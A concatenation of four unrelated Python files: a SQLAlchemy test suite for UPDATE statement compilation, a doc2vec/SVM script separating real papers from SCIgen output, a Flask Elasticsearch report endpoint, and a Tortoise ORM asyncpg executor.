== literal("foo") + table1.c.name + literal("lala")
),
preserve_parameter_order=True,
).values(values),
"UPDATE mytable "
"SET "
"name=(mytable.name || :name_1), "
"description=:description, "
"myid=do_stuff(mytable.myid, :param_1) "
"WHERE "
"mytable.myid = hoho(:hoho_1) AND "
"mytable.name = :param_2 || mytable.name || :param_3",
)
def test_update_ordered_parameters_fire_onupdate(self):
table = self.tables.update_w_default
values = [(table.c.y, table.c.x + 5), ("x", 10)]
self.assert_compile(
table.update(preserve_parameter_order=True).values(values),
"UPDATE update_w_default SET ycol=(update_w_default.x + :x_1), "
"x=:x, data=:data",
)
def test_update_ordered_parameters_override_onupdate(self):
table = self.tables.update_w_default
values = [
(table.c.y, table.c.x + 5),
(table.c.data, table.c.x + 10),
("x", 10),
]
self.assert_compile(
table.update(preserve_parameter_order=True).values(values),
"UPDATE update_w_default SET ycol=(update_w_default.x + :x_1), "
"data=(update_w_default.x + :x_2), x=:x",
)
def test_update_preserve_order_reqs_listtups(self):
table1 = self.tables.mytable
testing.assert_raises_message(
ValueError,
r"When preserve_parameter_order is True, values\(\) "
r"only accepts a list of 2-tuples",
table1.update(preserve_parameter_order=True).values,
{"description": "foo", "name": "bar"},
)
def test_update_ordereddict(self):
table1 = self.tables.mytable
# Confirm that ordered dicts are treated as normal dicts,
# columns sorted in table order
values = util.OrderedDict(
(
(table1.c.name, table1.c.name + "lala"),
(table1.c.myid, func.do_stuff(table1.c.myid, literal("hoho"))),
)
)
self.assert_compile(
update(
table1,
(table1.c.myid == func.hoho(4))
& (
table1.c.name
== literal("foo") + table1.c.name + literal("lala")
),
values=values,
),
"UPDATE mytable "
"SET "
"myid=do_stuff(mytable.myid, :param_1), "
"name=(mytable.name || :name_1) "
"WHERE "
"mytable.myid = hoho(:hoho_1) AND "
"mytable.name = :param_2 || mytable.name || :param_3",
)
def test_where_empty(self):
table1 = self.tables.mytable
self.assert_compile(
table1.update().where(
BooleanClauseList._construct_raw(operators.and_)
),
"UPDATE mytable SET myid=:myid, name=:name, "
"description=:description",
)
self.assert_compile(
table1.update().where(
BooleanClauseList._construct_raw(operators.or_)
),
"UPDATE mytable SET myid=:myid, name=:name, "
"description=:description",
)
def test_prefix_with(self):
table1 = self.tables.mytable
stmt = (
table1.update()
.prefix_with("A", "B", dialect="mysql")
.prefix_with("C", "D")
)
self.assert_compile(
stmt,
"UPDATE C D mytable SET myid=:myid, name=:name, "
"description=:description",
)
self.assert_compile(
stmt,
"UPDATE A B C D mytable SET myid=%s, name=%s, description=%s",
dialect=mysql.dialect(),
)
def test_update_to_expression(self):
"""test update from an expression.
this logic is triggered currently by a left side that doesn't
have a key. The current supported use case is updating the index
of a PostgreSQL ARRAY type.
"""
table1 = self.tables.mytable
expr = func.foo(table1.c.myid)
eq_(expr.key, None)
self.assert_compile(
table1.update().values({expr: "bar"}),
"UPDATE mytable SET foo(myid)=:param_1",
)
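# Illustrative sketch (hypothetical, not part of this suite) of the
# PostgreSQL ARRAY use case mentioned in the docstring above; assumes an
# ARRAY column named "data":
#
#   from sqlalchemy.dialects.postgresql import ARRAY
#   t = Table("t", MetaData(), Column("data", ARRAY(Integer)))
#   t.update().values({t.c.data[2]: 5})
#   # compiles along the lines of:
#   # UPDATE t SET data[%(data_1)s]=%(param_1)s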
def test_update_bound_ordering(self):
"""test that bound parameters between the UPDATE and FROM clauses
order correctly in different SQL compilation scenarios.
"""
table1 = self.tables.mytable
table2 = self.tables.myothertable
sel = select([table2]).where(table2.c.otherid == 5).alias()
upd = (
table1.update()
.where(table1.c.name == sel.c.othername)
.values(name="foo")
)
dialect = default.StrCompileDialect()
dialect.positional = True
self.assert_compile(
upd,
"UPDATE mytable SET name=:name FROM (SELECT "
"myothertable.otherid AS otherid, "
"myothertable.othername AS othername "
"FROM myothertable "
"WHERE myothertable.otherid = :otherid_1) AS anon_1 "
"WHERE mytable.name = anon_1.othername",
checkpositional=("foo", 5),
dialect=dialect,
)
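# On the default string dialect the SET clause renders before the FROM
# subquery, so the positional parameters arrive as ("foo", 5); the MySQL
# form below lists the joined tables before SET, flipping the order to
# (5, "foo").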
self.assert_compile(
upd,
"UPDATE mytable, (SELECT myothertable.otherid AS otherid, "
"myothertable.othername AS othername "
"FROM myothertable "
"WHERE myothertable.otherid = %s) AS anon_1 SET mytable.name=%s "
"WHERE mytable.name = anon_1.othername",
checkpositional=(5, "foo"),
dialect=mysql.dialect(),
)
class UpdateFromCompileTest(
_UpdateFromTestBase, fixtures.TablesTest, AssertsCompiledSQL
):
__dialect__ = "default_enhanced"
run_create_tables = run_inserts = run_deletes = None
def test_alias_one(self):
table1 = self.tables.mytable
talias1 = table1.alias("t1")
# This case is nonsensical: the UPDATE is entirely against the alias,
# but we name the table-bound column in values. The behavior here
# isn't really defined.
self.assert_compile(
update(talias1, talias1.c.myid == 7).values(
{table1.c.name: "fred"}
),
"UPDATE mytable AS t1 "
"SET name=:name "
"WHERE t1.myid = :myid_1",
)
def test_alias_two(self):
table1 = self.tables.mytable
talias1 = table1.alias("t1")
# Here, unlike test_alias_one(), we actually have UPDATE..FROM,
# which causes the "table1.c.name" parameter to be handled as an
# "extra table"; hence we see the full table name rendered.
self.assert_compile(
update(talias1, table1.c.myid == 7).values(
{table1.c.name: "fred"}
),
"UPDATE mytable AS t1 "
"SET name=:mytable_name "
"FROM mytable "
"WHERE mytable.myid = :myid_1",
checkparams={"mytable_name": "fred", "myid_1": 7},
)
def test_alias_two_mysql(self):
table1 = self.tables.mytable
talias1 = table1.alias("t1")
self.assert_compile(
update(talias1, table1.c.myid == 7).values(
{table1.c.name: "fred"}
),
"UPDATE mytable AS t1, mytable SET mytable.name=%s "
"WHERE mytable.myid = %s",
checkparams={"mytable_name": "fred", "myid_1": 7},
dialect="mysql",
)
def test_update_from_multitable_same_name_mysql(self):
users, addresses = self.tables.users, self.tables.addresses
self.assert_compile(
users.update()
.values(name="newname")
.values({addresses.c.name: "new address"})
.where(users.c.id == addresses.c.user_id),
"UPDATE users, addresses SET addresses.name=%s, "
"users.name=%s WHERE users.id = addresses.user_id",
checkparams={"addresses_name": "new address", "name": "newname"},
dialect="mysql",
)
def test_update_from_join_mysql(self):
users, addresses = self.tables.users, self.tables.addresses
j = users.join(addresses)
self.assert_compile(
update(j)
.values(name="newname")
.where(addresses.c.email_address == "e1"),
"UPDATE users "
"INNER JOIN addresses ON users.id = addresses.user_id "
"SET users.name=%s "
"WHERE "
"addresses.email_address = %s",
checkparams={"email_address_1": "e1", "name": "newname"},
dialect=mysql.dialect(),
)
def test_render_table(self):
users, addresses = self.tables.users, self.tables.addresses
self.assert_compile(
users.update()
.values(name="newname")
.where(users.c.id == addresses.c.user_id)
.where(addresses.c.email_address == "e1"),
"UPDATE users "
"SET name=:name FROM addresses "
"WHERE "
"users.id = addresses.user_id AND "
"addresses.email_address = :email_address_1",
checkparams={"email_address_1": "e1", "name": "newname"},
)
def test_render_multi_table(self):
users = self.tables.users
addresses = self.tables.addresses
dingalings = self.tables.dingalings
checkparams = {"email_address_1": "e1", "id_1": 2, "name": "newname"}
self.assert_compile(
users.update()
.values(name="newname")
.where(users.c.id == addresses.c.user_id)
.where(addresses.c.email_address == "e1")
.where(addresses.c.id == dingalings.c.address_id)
.where(dingalings.c.id == 2),
"UPDATE users "
"SET name=:name "
"FROM addresses, dingalings "
"WHERE "
"users.id = addresses.user_id AND "
"addresses.email_address = :email_address_1 AND "
"addresses.id = dingalings.address_id AND "
"dingalings.id = :id_1",
checkparams=checkparams,
)
def test_render_table_mysql(self):
users, addresses = self.tables.users, self.tables.addresses
self.assert_compile(
users.update()
.values(name="newname")
.where(users.c.id == addresses.c.user_id)
.where(addresses.c.email_address == "e1"),
"UPDATE users, addresses "
"SET users.name=%s "
"WHERE "
"users.id = addresses.user_id AND "
"addresses.email_address = %s",
checkparams={"email_address_1": "e1", "name": "newname"},
dialect=mysql.dialect(),
)
def test_render_subquery(self):
users, addresses = self.tables.users, self.tables.addresses
checkparams = {"email_address_1": "e1", "id_1": 7, "name": "newname"}
cols = [addresses.c.id, addresses.c.user_id, addresses.c.email_address]
subq = select(cols).where(addresses.c.id == 7).alias()
self.assert_compile(
users.update()
.values(name="newname")
.where(users.c.id == subq.c.user_id)
.where(subq.c.email_address == "e1"),
"UPDATE users "
"SET name=:name FROM ("
"SELECT "
"addresses.id AS id, "
"addresses.user_id AS user_id, "
"addresses.email_address AS email_address "
"FROM addresses "
"WHERE addresses.id = :id_1"
") AS anon_1 "
"WHERE users.id = anon_1.user_id "
"AND anon_1.email_address = :email_address_1",
checkparams=checkparams,
)
def test_correlation_to_extra(self):
users, addresses = self.tables.users, self.tables.addresses
stmt = (
users.update()
.values(name="newname")
.where(users.c.id == addresses.c.user_id)
.where(
~exists()
.where(addresses.c.user_id == users.c.id)
.where(addresses.c.email_address == "foo")
.correlate(addresses)
)
)
self.assert_compile(
stmt,
"UPDATE users SET name=:name FROM addresses WHERE "
"users.id = addresses.user_id AND NOT "
"(EXISTS (SELECT * FROM users WHERE addresses.user_id = users.id "
"AND addresses.email_address = :email_address_1))",
)
def test_dont_correlate_to_extra(self):
users, addresses = self.tables.users, self.tables.addresses
stmt = (
users.update()
.values(name="newname")
.where(users.c.id == addresses.c.user_id)
.where(
~exists()
.where(addresses.c.user_id == users.c.id)
.where(addresses.c.email_address == "foo")
.correlate()
)
)
self.assert_compile(
stmt,
"UPDATE users SET name=:name FROM addresses WHERE "
"users.id = addresses.user_id AND NOT "
"(EXISTS (SELECT * FROM addresses, users "
"WHERE addresses.user_id = users.id "
"AND addresses.email_address = :email_address_1))",
)
def test_autocorrelate_error(self):
users, addresses = self.tables.users, self.tables.addresses
stmt = (
users.update()
.values(name="newname")
.where(users.c.id == addresses.c.user_id)
.where(
~exists()
.where(addresses.c.user_id == users.c.id)
.where(addresses.c.email_address == "foo")
)
)
assert_raises_message(
exc.InvalidRequestError,
".*returned no FROM clauses due to auto-correlation.*",
stmt.compile,
dialect=default.StrCompileDialect(),
)
class UpdateFromRoundTripTest(_UpdateFromTestBase, fixtures.TablesTest):
__backend__ = True
@testing.requires.update_from
def test_exec_two_table(self):
users, addresses = self.tables.users, self.tables.addresses
testing.db.execute(
addresses.update()
.values(email_address=users.c.name)
.where(users.c.id == addresses.c.user_id)
.where(users.c.name == "ed")
)
expected = [
(1, 7, "x", "jack@bean.com"),
(2, 8, "x", "ed"),
(3, 8, "x", "ed"),
(4, 8, "x", "ed"),
(5, 9, "x", "fred@fred.com"),
]
self._assert_addresses(addresses, expected)
@testing.requires.update_from
def test_exec_two_table_plus_alias(self):
users, addresses = self.tables.users, self.tables.addresses
a1 = addresses.alias()
testing.db.execute(
addresses.update()
.values(email_address=users.c.name)
.where(users.c.id == a1.c.user_id)
.where(users.c.name == "ed")
.where(a1.c.id == addresses.c.id)
)
expected = [
(1, 7, "x", "jack@bean.com"),
(2, 8, "x", "ed"),
(3, 8, "x", "ed"),
(4, 8, "x", "ed"),
(5, 9, "x", "fred@fred.com"),
]
self._assert_addresses(addresses, expected)
@testing.requires.update_from
def test_exec_three_table(self):
users = self.tables.users
addresses = self.tables.addresses
dingalings = self.tables.dingalings
testing.db.execute(
addresses.update()
.values(email_address=users.c.name)
.where(users.c.id == addresses.c.user_id)
.where(users.c.name == "ed")
.where(addresses.c.id == dingalings.c.address_id)
.where(dingalings.c.id == 1)
)
expected = [
(1, 7, "x", "jack@bean.com"),
(2, 8, "x", "ed"),
(3, 8, "x", "ed@bettyboop.com"),
(4, 8, "x", "ed@lala.com"),
(5, 9, "x", "fred@fred.com"),
]
self._assert_addresses(addresses, expected)
@testing.only_on("mysql", "Multi table update")
def test_exec_multitable(self):
users, addresses = self.tables.users, self.tables.addresses
values = {addresses.c.email_address: "updated", users.c.name: "ed2"}
testing.db.execute(
addresses.update()
.values(values)
.where(users.c.id == addresses.c.user_id)
.where(users.c.name == "ed")
)
expected = [
(1, 7, "x", "jack@bean.com"),
(2, 8, "x", "updated"),
(3, 8, "x", "updated"),
(4, 8, "x", "updated"),
(5, 9, "x", "fred@fred.com"),
]
self._assert_addresses(addresses, expected)
expected = [(7, "jack"), (8, "ed2"), (9, "fred"), (10, "chuck")]
self._assert_users(users, expected)
@testing.only_on("mysql", "Multi table update")
def test_exec_join_multitable(self):
users, addresses = self.tables.users, self.tables.addresses
values = {addresses.c.email_address: "updated", users.c.name: "ed2"}
testing.db.execute(
update(users.join(addresses))
.values(values)
.where(users.c.name == "ed")
)
expected = [
(1, 7, "x", "jack@bean.com"),
(2, 8, "x", "updated"),
(3, 8, "x", "updated"),
(4, 8, "x", "updated"),
(5, 9, "x", "fred@fred.com"),
]
self._assert_addresses(addresses, expected)
expected = [(7, "jack"), (8, "ed2"), (9, "fred"), (10, "chuck")]
self._assert_users(users, expected)
@testing.only_on("mysql", "Multi table update")
def test_exec_multitable_same_name(self):
users, addresses = self.tables.users, self.tables.addresses
values = {addresses.c.name: "ad_ed2", users.c.name: "ed2"}
testing.db.execute(
addresses.update()
.values(values)
.where(users.c.id == addresses.c.user_id)
.where(users.c.name == "ed")
)
expected = [
(1, 7, "x", "jack@bean.com"),
(2, 8, "ad_ed2", "ed@wood.com"),
(3, 8, "ad_ed2", "ed@bettyboop.com"),
(4, 8, "ad_ed2", "ed@lala.com"),
(5, 9, "x", "fred@fred.com"),
]
self._assert_addresses(addresses, expected)
expected = [(7, "jack"), (8, "ed2"), (9, "fred"), (10, "chuck")]
self._assert_users(users, expected)
def _assert_addresses(self, addresses, expected):
stmt = addresses.select().order_by(addresses.c.id)
eq_(testing.db.execute(stmt).fetchall(), expected)
def _assert_users(self, users, expected):
stmt = users.select().order_by(users.c.id)
eq_(testing.db.execute(stmt).fetchall(), expected)
class UpdateFromMultiTableUpdateDefaultsTest(
_UpdateFromTestBase, fixtures.TablesTest
):
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("name", String(30), nullable=False),
Column("some_update", String(30), onupdate="im the update"),
)
Table(
"addresses",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("user_id", None, ForeignKey("users.id")),
Column("email_address", String(50), nullable=False),
)
Table(
"foobar",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("user_id", None, ForeignKey("users.id")),
Column("data", String(30)),
Column("some_update", String(30), onupdate="im the other update"),
)
@classmethod
def fixtures(cls):
return dict(
users=(
("id", "name", "some_update"),
(8, "ed", "value"),
(9, "fred", "value"),
),
addresses=(
("id", "user_id", "email_address"),
(2, 8, "ed@wood.com"),
(3, 8, "ed@bettyboop.com"),
(4, 9, "fred@fred.com"),
),
foobar=(
("id", "user_id", "data"),
(2, 8, "d1"),
(3, 8, "d2"),
(4, 9, "d3"),
),
)
@testing.only_on("mysql", "Multi table update")
def test_defaults_second_table(self):
users, addresses = self.tables.users, self.tables.addresses
values = {addresses.c.email_address: "updated", users.c.name: "ed2"}
ret = testing.db.execute(
addresses.update()
.values(values)
.where(users.c.id == addresses.c.user_id)
.where(users.c.name == "ed")
)
eq_(set(ret.prefetch_cols()), set([users.c.some_update]))
expected = [
(2, 8, "updated"),
(3, 8, "updated"),
(4, 9, "fred@fred.com"),
]
self._assert_addresses(addresses, expected)
expected = [(8, "ed2", "im the update"), (9, "fred", "value")]
self._assert_users(users, expected)
@testing.only_on("mysql", "Multi table update")
def test_defaults_second_table_same_name(self):
users, foobar = self.tables.users, self.tables.foobar
values = {foobar.c.data: foobar.c.data + "a", users.c.name: "ed2"}
ret = testing.db.execute(
users.update()
.values(values)
.where(users.c.id == foobar.c.user_id)
.where(users.c.name == "ed")
)
eq_(
set(ret.prefetch_cols()),
set([users.c.some_update, foobar.c.some_update]),
)
expected = [
(2, 8, "d1a", "im the other update"),
(3, 8, "d2a", "im the other update"),
(4, 9, "d3", None),
]
self._assert_foobar(foobar, expected)
expected = [(8, "ed2", "im the update"), (9, "fred", "value")]
self._assert_users(users, expected)
@testing.only_on("mysql", "Multi table update")
def test_no_defaults_second_table(self):
users, addresses = self.tables.users, self.tables.addresses
ret = testing.db.execute(
addresses.update()
.values({"email_address": users.c.name})
.where(users.c.id == addresses.c.user_id)
.where(users.c.name == "ed")
)
eq_(ret.prefetch_cols(), [])
expected = [(2, 8, "ed"), (3, 8, "ed"), (4, 9, "fred@fred.com")]
self._assert_addresses(addresses, expected)
# users table not actually updated, so no onupdate
expected = [(8, "ed", "value"), (9, "fred", "value")]
self._assert_users(users, expected)
def _assert_foobar(self, foobar, expected):
stmt = foobar.select().order_by(foobar.c.id)
eq_(testing.db.execute(stmt).fetchall(), expected)
def _assert_addresses(self, addresses, expected):
stmt = addresses.select().order_by(addresses.c.id)
eq_(testing.db.execute(stmt).fetchall(), expected)
def _assert_users(self, users, expected):
stmt = users.select().order_by(users.c.id)
eq_(testing.db.execute(stmt).fetchall(), expected)
|
#doc2vector
import csv
import pandas as pd
import numpy as np
from sklearn import svm
from sklearn.feature_extraction import text
from sklearn.model_selection import train_test_split
from sklearn import metrics
from sklearn.metrics import roc_curve,auc,f1_score
import matplotlib.pyplot as plt
from gensim.models import doc2vec
from gensim import corpora
from gensim.parsing.preprocessing import strip_numeric
from gensim.parsing.preprocessing import remove_stopwords
from gensim.parsing.preprocessing import strip_short
from gensim.parsing.preprocessing import strip_non_alphanum
stop_words = text.ENGLISH_STOP_WORDS.union([u'apr',u'archetypr',u'aug',u'configuration',u'conference',u'continuing'])#estimate
sci_file = "cs_papers/sci_after_filter.csv"
scigen_file = "cs_papers/scigen_after_filter.csv"
#import csv, build label
#label: a=1,b=0
def import_data(a_file,a_row,b_file,b_row):
a_content = []
a_content_1 = open(a_file, 'r')
csv_reader_a = csv.reader(a_content_1)
for row in csv_reader_a:
row_new = remove_stopwords(row[a_row])
row_new = strip_numeric(row_new)
row_new = strip_non_alphanum(row_new)
row_new = strip_short(row_new,minsize = 3)
a_content.append(row_new)
a_length = len(a_content)
a_label = np.ones(a_length)
a_label = a_label.tolist()
b_content = []
b_content_1 = open(b_file, 'r')
csv_reader_b = csv.reader(b_content_1)
for row in csv_reader_b:
row_new = remove_stopwords(row[b_row])
row_new = strip_numeric(row_new)
row_new = strip_non_alphanum(row_new)
row_new = strip_short(row_new,minsize = 3)
b_content.append(row_new)
b_length = len(b_content)
b_label = np.zeros(b_length)
b_label = b_label.tolist()
return a_content, a_label, b_content, b_label
sci_content, sci_label, scigen_content, scigen_label = import_data(sci_file, 1, scigen_file, 1)
len1=len(sci_content)
len2=len(scigen_content)
data = sci_content+scigen_content
label = sci_label+scigen_label
def build_dict(data,stop_words):
texts = [[word for word in document.lower().split() if word not in stop_words]
for document in data]
dictionary = corpora.Dictionary(texts)
return texts,dictionary
content, dictionary = build_dict(data, stop_words)
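# Note: the gensim Dictionary built above is not used further below; only
# the tokenized texts are fed to Doc2Vec.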
def labelizeReviews(reviews):
labelized = []
for i, v in enumerate(reviews):
tag = '%s' % i
labelized.append(doc2vec.LabeledSentence(v, [tag]))
return labelized
content1 = labelizeReviews(content)
model = doc2vec.Doc2Vec(content1,min_count=1,window=5,size=200)
model.save("doc_auto_human_passage.model")
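# getVecs looks up the stored vector for each tagged document (by the
# string tag assigned in labelizeReviews) and stacks them into an
# (n_docs, size) numpy matrix for the SVM below.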
def getVecs(model, corpus, size):
vecs = [np.array(model.docvecs[z.tags[0]]).reshape((1, size)) for z in corpus]
return np.concatenate(vecs)
def f1(content, label, cross_fold):
f1_mean = 0
for i in range(0,cross_fold):
print(i)
content_auto = content[0:928]
content_human = content[928:1836]
label_auto = label[0:928]
label_human = label[928:1836]
random_num = np.random.randint(low=0, high=100)
content_train_auto,content_test_auto,label_train_auto,label_test_auto = train_test_split(content_auto, label_auto, test_size=0.2,random_state=random_num)
random_num = np.random.randint(low=0, high=100)
content_train_human,content_test_human,label_train_human,label_test_human = train_test_split(content_human, label_human, test_size=0.2,random_state=random_num)
content_train = content_train_auto+content_train_human
content_test = content_test_auto+content_test_human
label_train = label_train_auto+label_train_human
label_test = label_test_auto+label_test_human
#build document vector matrices for the train/test split
d2v_model = doc2vec.Doc2Vec.load("doc_auto_human_passage.model")
#print("d2v model loaded")
train = getVecs(d2v_model, content_train, 200)
#print("train matrix built")
test = getVecs(d2v_model, content_test, 200)
#print("test matrix built")
clf = svm.SVC(kernel='linear')
clf_res = clf.fit(train, label_train)
pred = clf_res.predict(test)
score_micro = f1_score(label_test, pred, average='micro')
score_macro = f1_score(label_test, pred, average='macro')
f1 = (score_macro + score_micro) / 2
print('f1: %0.20f' % f1)
f1_mean += f1
f1_mean = f1_mean / cross_fold
print('f1_mean: %0.20f' % f1_mean)
f1(content1, label, 10)
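# Hedged usage sketch (not part of the original script): scoring a new,
# unseen abstract against the trained model, assuming the gensim Doc2Vec
# API exposes infer_vector() and docvecs.most_similar():
#
#   new_tokens = remove_stopwords("an unseen abstract to score").lower().split()
#   new_vec = model.infer_vector(new_tokens)
#   print(model.docvecs.most_similar([new_vec], topn=5))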
|
from flask import Blueprint, request
from flask_jwt_extended import jwt_required
from utils.custom_exception import InvalidUsage
from utils.esconn import ESConn, GroupByParams
from utils.response import set_response
from utils.constants import ES_TERMS_AGGR_SIZE, REPORT_INDEX, TIME_UNIT_MAPPING
reports_api = Blueprint("reports_api", __name__)
@reports_api.route('/detailed_report_status', methods=['GET'], endpoint="api_v1_5_get_detailed_report_api_status")
@jwt_required()
def get_detailed_report_api_status():
param = GroupByParams(REPORT_INDEX)
param.add_agg_field_generic('report_id.keyword', 'terms', "status", size=ES_TERMS_AGGR_SIZE)
param.add_agg_field_generic('', 'top_hits', 'document', size=1, sort=[{"@timestamp": {"order": "desc"}}])
es_response = ESConn.group_by(param, None)
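# Assumed response shape, based on the aggregations configured above:
# es_response["status"]["buckets"] is one bucket per report_id, each with a
# "document" top_hits aggregation holding that report's newest document.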
data = []
for ele in es_response['status']['buckets']:
for info in ele['document']['hits']['hits']:
data.append(info['_source'])
data = sorted(data, key=lambda k: k["@timestamp"], reverse=True)
return set_response(data=data)
|
import uuid
from typing import Optional, Sequence
import asyncpg
from pypika import Parameter
from pypika.terms import Term
from tortoise import Model
from tortoise.backends.base.executor import BaseExecutor
from tortoise.contrib.postgres.json_functions import (
postgres_json_contained_by,
postgres_json_contains,
postgres_json_filter,
)
from tortoise.contrib.postgres.search import SearchCriterion
from tortoise.filters import json_contained_by, json_contains, json_filter, search
def postgres_search(field: Term, value: Term):
return SearchCriterion(field, expr=value)
class AsyncpgExecutor(BaseExecutor):
EXPLAIN_PREFIX = "EXPLAIN (FORMAT JSON, VERBOSE)"
DB_NATIVE = BaseExecutor.DB_NATIVE | {bool, uuid.UUID}
FILTER_FUNC_OVERRIDE = {
search: postgres_search,
json_contains: postgres_json_contains,
json_contained_by: postgres_json_contained_by,
json_filter: postgres_json_filter,
}
def parameter(self, pos: int) -> Parameter:
return Parameter("$%d" % (pos + 1,))
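# e.g. parameter(0) renders "$1", parameter(1) renders "$2"; asyncpg expects
# 1-based positional placeholders.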
def _prepare_insert_statement(self, columns: Sequence[str], has_generated: bool = True) -> str:
query = (
self.db.query_class.into(self.model._meta.basetable)
.columns(*columns)
.insert(*[self.parameter(i) for i in range(len(columns))])
)
if has_generated:
generated_fields = self.model._meta.generated_db_fields
if generated_fields:
query = query.returning(*generated_fields)
return str(query)
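# Illustration (hypothetical columns, not from the original): for a table
# "users" with columns ("name", "email") and a generated "id" column, the
# statement built above renders roughly as
#   INSERT INTO "users" ("name","email") VALUES ($1,$2) RETURNING "id"
# using the $n placeholders produced by parameter().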
async def _process_insert_result(
self, instance: Model, results: Optional[asyncpg.Record]
) -> None:
if results:
generated_fields = self.model._meta.generated_db_fields
db_projection = instance._meta.fields_db_projection_reverse
for key, val in zip(generated_fields, results):
setattr(instance, db_projection[key], val)
|